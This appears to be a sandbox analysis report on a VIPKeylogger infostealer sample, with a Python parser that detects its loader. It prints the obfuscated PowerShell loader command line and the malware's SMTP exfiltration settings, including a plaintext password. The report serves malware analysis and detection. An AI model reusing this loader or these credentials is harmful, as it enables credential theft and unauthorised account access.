Analysis
max time kernel: 144s
max time network: 143s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-12-2024 03:06
Static task: static1

Behavioral task: behavioral1
Sample: 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe
Resource: win7-20240729-en

Behavioral task: behavioral2
Sample: 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe
Resource: win10v2004-20241007-en
General
Target: 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe
Size: 1.0MB
MD5: ca3706dd6a93c5928ee3252054a7ec74
SHA1: 402c4c006bf0e4d7afec7687f6033dccf11c6aa1
SHA256: 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e
SHA512: e83540a28bb8b6a014d40cc66842b0c045e712f894df967ade6939461120f61a9580c85c3915aa8103c4faa40077a26d9e9dbecfc7086a9529105c2e409b048d
SSDEEP: 24576:Ij+EfvosO3Hx7JwmNG3Ap137dboaPjyMi76Kb0:Y+MvpoOt3IRM+i76f
Malware Config
Extracted: vipkeylogger
Protocol: smtp
Host: smtp.ionos.es
Port: 587
Username: [email protected]
Password: JA-*2020antonio
Email To: [email protected]
Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#. It resembles SnakeKeylogger, which was first observed in 2020.

Vipkeylogger family
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Blocklisted process makes network request (8 IoCs)
flow | pid | Process
28 | 3512 | msiexec.exe
32 | 3512 | msiexec.exe
36 | 3512 | msiexec.exe
38 | 3512 | msiexec.exe
40 | 3512 | msiexec.exe
47 | 3512 | msiexec.exe
49 | 3512 | msiexec.exe
52 | 3512 | msiexec.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow | ioc
27 | drive.google.com
28 | drive.google.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
46 | checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
pid | Process
3512 | msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid | Process
2224 | powershell.exe
3512 | msiexec.exe

pid | Process
2224 | powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | msiexec.exe

Suspicious behavior: EnumeratesProcesses (9 IoCs)
pid | Process
2224 | powershell.exe
2224 | powershell.exe
2224 | powershell.exe
2224 | powershell.exe
2224 | powershell.exe
2224 | powershell.exe
2224 | powershell.exe
3512 | msiexec.exe
3512 | msiexec.exe

Suspicious behavior: MapViewOfSection (1 IoC)
pid | Process
2224 | powershell.exe

Suspicious use of AdjustPrivilegeToken (23 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2224 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2224 | powershell.exe
Token: SeSecurityPrivilege | 2224 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2224 | powershell.exe
Token: SeLoadDriverPrivilege | 2224 | powershell.exe
Token: SeSystemProfilePrivilege | 2224 | powershell.exe
Token: SeSystemtimePrivilege | 2224 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2224 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2224 | powershell.exe
Token: SeCreatePagefilePrivilege | 2224 | powershell.exe
Token: SeBackupPrivilege | 2224 | powershell.exe
Token: SeRestorePrivilege | 2224 | powershell.exe
Token: SeShutdownPrivilege | 2224 | powershell.exe
Token: SeDebugPrivilege | 2224 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2224 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2224 | powershell.exe
Token: SeUndockPrivilege | 2224 | powershell.exe
Token: SeManageVolumePrivilege | 2224 | powershell.exe
Token: 33 | 2224 | powershell.exe
Token: 34 | 2224 | powershell.exe
Token: 35 | 2224 | powershell.exe
Token: 36 | 2224 | powershell.exe
Token: SeDebugPrivilege | 3512 | msiexec.exe

Suspicious use of WriteProcessMemory (7 IoCs)
description | pid | Process | procid_target
PID 4616 wrote to memory of 2224 | 4616 | 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe | 83
PID 4616 wrote to memory of 2224 | 4616 | 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe | 83
PID 4616 wrote to memory of 2224 | 4616 | 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe | 83
PID 2224 wrote to memory of 3512 | 2224 | powershell.exe | 98
PID 2224 wrote to memory of 3512 | 2224 | powershell.exe | 98
PID 2224 wrote to memory of 3512 | 2224 | powershell.exe | 98
PID 2224 wrote to memory of 3512 | 2224 | powershell.exe | 98

outlook_office_path (1 IoC)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe

outlook_win_path (1 IoC)
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | msiexec.exe
Processes

1. C:\Users\Admin\AppData\Local\Temp\855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe"
   PID: 4616
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of PID 4616)
      Command line: "powershell.exe" -windowstyle minimized "$Lucid=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\Polysulfonate\sangersken\Thiostannous.Acu';$Astelic=$Lucid.SubString(38084,3);.$Astelic($Lucid)"
      PID: 2224
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Command and Scripting Interpreter: PowerShell
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\msiexec.exe (child of PID 2224)
         Command line: "C:\Windows\SysWOW64\msiexec.exe"
         PID: 3512
         - Accesses Microsoft Outlook profiles
         - Blocklisted process makes network request
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - System Location Discovery: System Language Discovery
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - outlook_office_path
         - outlook_win_path
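The second-level PowerShell command line in the tree above is the loader: it reads the dropped file Thiostannous.Acu as a single string, takes the three characters at offset 38084 as a command name, and dot-invokes that name with the whole file as its argument, so the entire file is evaluated as script while the command line itself never contains a recognisable cmdlet. The WriteProcessMemory rows then show this PowerShell (PID 2224) writing into the argument-less msiexec.exe (PID 3512), which is where the Outlook profile reads and the SMTP traffic come from. The Python below is an added example, not part of the Triage report or the sample: it parses that command line with a pattern that tolerates the per-sample random variable names and slices a constructed stand-in payload the same way SubString would. The report does not show the file's content, so "iex" at that offset is the example's assumption, as is the INVOKERS table.

```python
"""Parse the Get-Content/SubString PowerShell loader from this report.

Nothing is executed: the script only parses the command line and slices a
constructed stand-in for the dropped file the way PowerShell's SubString would.
"""
import re
from dataclasses import dataclass, asdict
from typing import Optional

# Loader shape: read a file as one string, slice a short command name out of it
# at a fixed offset, then dot-invoke that name with the whole string as its
# argument. Variable names are random per sample, so they are captured once and
# matched again with backreferences.
LOADER_RE = re.compile(
    r"\$(?P<buf>\w+)\s*=\s*Get-Content\s+-Raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=buf)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;"
    r"\s*\.\s*\$(?P=cmd)\s*\(\s*\$(?P=buf)\s*\)",
    re.IGNORECASE,
)

# Command names worth hiding this way. Assumption: the report does not show the
# dropped file, so "iex" at offset 38084 is the example's guess, not a fact.
INVOKERS = {
    "iex": "Invoke-Expression",
    "invoke-expression": "Invoke-Expression",
    "icm": "Invoke-Command",
    "invoke-command": "Invoke-Command",
}


@dataclass
class LoaderFinding:
    payload_path: str
    offset: int
    length: int
    invoker: str              # characters actually sliced from the file
    resolved: Optional[str]   # canonical cmdlet name if recognised
    executes_whole_file: bool


def parse_loader(cmdline: str) -> Optional[dict]:
    """Return path/offset/length if cmdline matches the loader pattern, else None."""
    m = LOADER_RE.search(cmdline)
    if not m:
        return None
    return {"path": m["path"], "offset": int(m["off"]), "length": int(m["len"])}


def decode_loader(cmdline: str, payload_text: str) -> LoaderFinding:
    """Slice the hidden command name out of payload_text as SubString would.

    payload_text must be the file decoded with the encoding Get-Content -Raw
    would pick, because SubString counts characters, not bytes.
    """
    parts = parse_loader(cmdline)
    if parts is None:
        raise ValueError("command line does not match the Get-Content/SubString loader")
    off, ln = parts["offset"], parts["length"]
    if off + ln > len(payload_text):
        raise ValueError(f"payload has {len(payload_text)} chars; SubString({off},{ln}) is out of range")
    invoker = payload_text[off:off + ln]
    return LoaderFinding(
        payload_path=parts["path"],
        offset=off,
        length=ln,
        invoker=invoker,
        resolved=INVOKERS.get(invoker.lower()),
        # .$cmd($buf) hands the entire file content to the command, so the
        # whole file is what gets evaluated, not just the sliced characters.
        executes_whole_file=True,
    )


# Command line copied from the report (PID 2224).
REPORT_CMDLINE = (
    '"powershell.exe" -windowstyle minimized "$Lucid=Get-Content -Raw '
    "'C:\\Users\\Admin\\AppData\\Roaming\\Polysulfonate\\sangersken\\Thiostannous.Acu';"
    '$Astelic=$Lucid.SubString(38084,3);.$Astelic($Lucid)"'
)

# Constructed stand-in for Thiostannous.Acu: comment filler up to the offset,
# then the assumed "iex", then whatever script would follow.
CONSTRUCTED_PAYLOAD = "#" * 38084 + "iex" + "\n# remainder of the script\n"

if __name__ == "__main__":
    for key, value in asdict(decode_loader(REPORT_CMDLINE, CONSTRUCTED_PAYLOAD)).items():
        print(f"{key:20} {value}")
```

When running this against the real dropped file, decode it with the encoding Get-Content -Raw would choose (BOM-detected, otherwise the system ANSI code page on Windows PowerShell 5.1) before slicing, since the offset counts characters rather than bytes. parse_loader on its own is also a usable detection predicate for command lines of this shape, independent of the file.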
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 339KB
MD5: 39b0c0cf6d25b364d98840393dbea7f3
SHA1: eb6abe677a18bc3a161c5994c17c9e71f36c5858
SHA256: fd00d2f748df7bf57d8f1b8ecd96c7c7d48c1d8c09f51b60e28604909e1ddbf8
SHA512: 2717f5f40538f76a19856f2b381a47c6a8ada9d88c0db1d0c4a5c1a56f01413d95cf309c2775412ed36ac2e2f5e9d175cae9cd97caae49ab41f5c489a5821942

Filesize: 70KB
MD5: 48f0b11394175f6bb32ab16ce8aaa446
SHA1: a3b755ba1fb7a92c5196a43e386eb0a845e6f828
SHA256: 32de1d7c55c09a44da7c79a55e1653a6a8a1f9215259bbb2b1defd7a6bf0c9a0
SHA512: f4f016d1655b4bbd90effc5e5d090b683f9a9fb76f5c02e78536cfb1bc3ba185df648ba8eec5c140ff5868b7b5860fa0fb07242290565335cabfa5af3c66a941